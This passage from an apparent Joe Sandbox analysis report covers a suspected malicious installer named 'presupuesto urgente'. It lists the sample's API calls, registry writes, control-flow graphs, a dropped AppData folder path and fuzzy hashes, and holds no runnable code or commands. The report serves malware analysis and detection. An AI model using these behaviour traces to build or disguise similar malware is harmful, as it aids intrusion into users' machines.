                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                                                        • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                                                                                                                        • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                                                                                                                        • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8114030407.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8113998987.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8114063244.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8114087670.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1791698881-3916222277
                                                                                                                                                      • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                                                                                                                      • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                                                                                                                      • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                                                                                                                      • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 799 4023de-40240f call 402c37 * 2 call 402cc7 806 402415-40241f 799->806 807 402abf-402ace 799->807 809 402421-40242e call 402c37 lstrlenW 806->809 810 402432-402435 806->810 809->810 811 402437-402448 call 402c15 810->811 812 402449-40244c 810->812 811->812 816 40245d-402471 RegSetValueExW 812->816 817 40244e-402458 call 4031ba 812->817 821 402473 816->821 822 402476-402557 RegCloseKey 816->822 817->816 821->822 822->807 824 402885-40288c 822->824 824->807
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp,00000023,00000011,00000002), ref: 00402429
                                                                                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp,00000000,00000011,00000002), ref: 00402469
                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp,00000000,00000011,00000002), ref: 00402551
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseValuelstrlen
                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp
                                                                                                                                                      • API String ID: 2655323295-2192003154
                                                                                                                                                      • Opcode ID: e48b1e85c28757713ab227aa479e2b9ceb42c74d784ae5642fab68139845f862
                                                                                                                                                      • Instruction ID: 1eab41df84c6b24c6b923ea001d17cdc0cfdc7d4c8a499a75fdfc4da8179f3fa
                                                                                                                                                      • Opcode Fuzzy Hash: e48b1e85c28757713ab227aa479e2b9ceb42c74d784ae5642fab68139845f862
                                                                                                                                                      • Instruction Fuzzy Hash: A1118171E00108AFEB10AFA5DE49EAEBAB4EB54354F11803AF504F71D1DBB84D459B58

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 825 402d2a-402d53 call 40621d 827 402d58-402d5a 825->827 828 402dd0-402dd4 827->828 829 402d5c-402d62 827->829 830 402d7e-402d93 RegEnumKeyW 829->830 831 402d64-402d66 830->831 832 402d95-402da7 RegCloseKey call 40678a 830->832 834 402db6-402dc2 RegCloseKey 831->834 835 402d68-402d7c call 402d2a 831->835 839 402dc4-402dca RegDeleteKeyW 832->839 840 402da9-402db4 832->840 834->828 835->830 835->832 839->828 840->828
                                                                                                                                                      APIs
                                                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close$Enum
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 464197530-0
                                                                                                                                                      • Opcode ID: df4bd2222173038e22a6f7143f63260fc380016edffd80d7804df4238b5218be
                                                                                                                                                      • Instruction ID: 0f4b1bf7762f76a333ccd5711aab570045f86c75fcf3a50f9e11fcc9d843940a
                                                                                                                                                      • Opcode Fuzzy Hash: df4bd2222173038e22a6f7143f63260fc380016edffd80d7804df4238b5218be
                                                                                                                                                      • Instruction Fuzzy Hash: 21116A32540509FBDF129F90CE09BEE7B69EF58344F110076B905B50E0E7B5DE21AB68

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 926 4015c1-4015d5 call 402c37 call 405d2c 931 401631-401634 926->931 932 4015d7-4015ea call 405cae 926->932 934 401663-40224a call 401423 931->934 935 401636-401655 call 401423 call 4063b0 SetCurrentDirectoryW 931->935 939 401604-401607 call 405960 932->939 940 4015ec-4015ef 932->940 949 402885-40288c 934->949 950 402abf-402ace 934->950 935->950 955 40165b-40165e 935->955 951 40160c-40160e 939->951 940->939 943 4015f1-4015f8 call 40597d 940->943 943->939 959 4015fa-4015fd call 4058e3 943->959 949->950 952 401610-401615 951->952 953 401627-40162f 951->953 957 401624 952->957 958 401617-401622 GetFileAttributesW 952->958 953->931 953->932 955->950 957->953 958->953 958->957 962 401602 959->962 962->951
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,76892EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76892EE0,00000000), ref: 00405D3A
                                                                                                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
                                                                                                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                        • Part of subcall function 004058E3: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405926
                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                      Strings
                                                                                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet, xrefs: 00401640
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet
                                                                                                                                                      • API String ID: 1892508949-3950974724
                                                                                                                                                      • Opcode ID: 63e3afcb8f518b8f961fa91b0460bec2abaa85340c93af8d37e8798651ac2648
                                                                                                                                                      • Instruction ID: a4cb8c34a70438e14e420fb04ab38ad532f12a03bdfc5322accc4ce246dd33dc
                                                                                                                                                      • Opcode Fuzzy Hash: 63e3afcb8f518b8f961fa91b0460bec2abaa85340c93af8d37e8798651ac2648
                                                                                                                                                      • Instruction Fuzzy Hash: 9011BE31504104EBCF31AFA0CD0199F36A0EF14368B28493BEA45B22F1DB3E4D51DA4E
                                                                                                                                                      APIs
                                                                                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004059CB
                                                                                                                                                      Strings
                                                                                                                                                      • Error launching installer, xrefs: 004059A8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                      • String ID: Error launching installer
                                                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                                                      • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                                                      • Instruction ID: 7702c274cdf70951028335e9b96fa9876c0cc9a795fc840707e03dbfe60e7272
                                                                                                                                                      • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                                                      • Instruction Fuzzy Hash: B4E046F0A00209BFEB009BA4ED09F7BBAACFB04208F418431BD00F6190D774A8208A78
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
                                                                                                                                                      • Instruction ID: 1a1db7b112f5c349f32c040b215ce8adb2231ea54f988815808aa67dfaaa6b76
                                                                                                                                                      • Opcode Fuzzy Hash: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
                                                                                                                                                      • Instruction Fuzzy Hash: 6AA15271E04228CBDF28CFA8C8446ADBBB1FF44305F14816ED856BB281D7786A86DF45
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
                                                                                                                                                      • Instruction ID: 81ced8d75bd8cd674d530aa485ef516b0f39a629971cfce93107e9c84bdcedbb
                                                                                                                                                      • Opcode Fuzzy Hash: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
                                                                                                                                                      • Instruction Fuzzy Hash: 4E912170E04228CBDF28CFA8C8547ADBBB1FB44305F14816ED856BB281D778A986DF45
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
                                                                                                                                                      • Instruction ID: 6e186065c07e551db02da0b657444ed8a40fac9cbefa0218a87430385e41b7b0
                                                                                                                                                      • Opcode Fuzzy Hash: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
                                                                                                                                                      • Instruction Fuzzy Hash: F7814571E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB281C778A996DF45
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
                                                                                                                                                      • Instruction ID: 1a645af2666a8cd9619cdf871bd9e2c738fb6a6c353dc56c4864b2e7a25bf22b
                                                                                                                                                      • Opcode Fuzzy Hash: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
                                                                                                                                                      • Instruction Fuzzy Hash: 71816771E04228DBEF28CFA8C8447ADBBB1FB44301F14816AD956BB2C1C7786986DF45
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
                                                                                                                                                      • Instruction ID: b0583babc1dad824d13d86abae56a1a356e3ceb45be48e511182641c275db258
                                                                                                                                                      • Opcode Fuzzy Hash: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
                                                                                                                                                      • Instruction Fuzzy Hash: 8C712471E04228CFDF28CFA8C9447ADBBB1FB44305F15806AD856BB281D7386996DF45
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
                                                                                                                                                      • Instruction ID: 968097f9e37e498ed83c4652799cdf8e1ebeb5c7fee57b8dc09d96684c556b9e
                                                                                                                                                      • Opcode Fuzzy Hash: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
                                                                                                                                                      • Instruction Fuzzy Hash: 27712471E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786996DF45
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
                                                                                                                                                      • Instruction ID: 737cb098acab11621bc79b115fd6dc57f162d32c21417d2b0fd17844244e9397
                                                                                                                                                      • Opcode Fuzzy Hash: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
                                                                                                                                                      • Instruction Fuzzy Hash: 5A714571E04228CFEF28CF98C8447ADBBB1FB44305F14806AD956BB281C778A996DF45
                                                                                                                                                      APIs
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004032D6
                                                                                                                                                        • Part of subcall function 00403441: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F
                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 00403309
